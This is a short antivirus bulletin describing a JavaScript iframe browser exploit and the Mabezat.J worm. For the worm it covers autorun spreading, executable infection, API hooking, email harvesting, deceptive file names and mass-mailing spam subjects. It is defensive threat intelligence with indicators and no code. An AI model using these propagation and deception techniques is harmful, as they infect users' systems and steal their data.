Weekly Review - Wormania

Trojan.Exploit.ANPT

Yet another variation of the common JavaScript exploits that roam the wild wild web. It creates a 111 pixels wide iframe on infected websites and displays a specially crafted url which will use browser specific exploits to gain control over vulnerable computers.

It uses COOKIES to mark already infected systems.

Win32.Worm.Mabezat.J

This worm lurks under a friendly folder-like icon used to deceive users into clicking it. Upon execution it will open its parent folder (to act like a normal folder does) but will also create an autorun.inf file in each drive and copy itself under the name zPharaoh.exe. It will create a folder named tazebama in the current users' %Appdata% directory.

It will modify the registry to ensure the Autorun feature isn't disabled.

The worm has also the ability to infect executable files, by replacing 1768 byte from the entry point with it's own encrypted code. It can infect files from any drive that isn't write-protected (even removable drives).

If one of the infected files is executed, it will drop another file named tazebama.dll into %documents and settings% and will create more copies of itself there. It will execute the file %documents and settings%\hook.dl_, which will remain memory resident even after its parent process terminates execution. The library tazebama.dll will be loaded by each infected running process. This library will then hook several API functions (operating system routines) in order to infect more files.

The virus could miss-infect installer-kits or ordinary programs, causing them the function incorrectly or damaging them permanently. The memory resident code will make sure that zPharaoh.exe and autorun.inf are copied to every drive (even network shares, if they are mapped as a drive).

It maintains a log file (zPharaoh.dat) in the directory %appdata% of the current user. This log contains the sequence "tazebama trojan log file" at the begining and is used to store e-mail addresses gathered from .XML, .PHP, .LOG, .CHM, .HLP, .CPP, .PAS, .XLS, .PPT, .PDF, .ASPX, .ASP, .HTML, .HTM, .RTF and .TXT files found on the infected system.

The worm has the ability to spread over the local network by infecting shares when they are accessed by making 2 copies of itself in every directory. The name of the first file varies, and might be one of the following: WinrarSerialInstall.exe, KasperSky 6.0 key.doc.exe, NokiaN73Tools.exe, Office2007 serial.txt.exe, Make Windows Original.exe. The other copy will have the same name as the directory.

It is also a mass mailer. It uses its own SMTP engine to send e-mails at addresses harvested from the victim's computer.

Common subjects of the spam emails are: "ABOUT PEOPLE WITH WHOM MATRIMONY IS PROHIBITED", "Windows secrets", "Canada immigration", "Viruses history", "Web designer vacancy", "problem" etc.

In each case, the attachement is the actual virus. The e-mails may also contain the strings: "The original file name is %s and compressed by WinRAR no virus found. Use WinRAR to decompress the file." (where %s is the file name)

Information in this article is available courtesy of BitDefender virus researchers: Lutas Andrei Vlad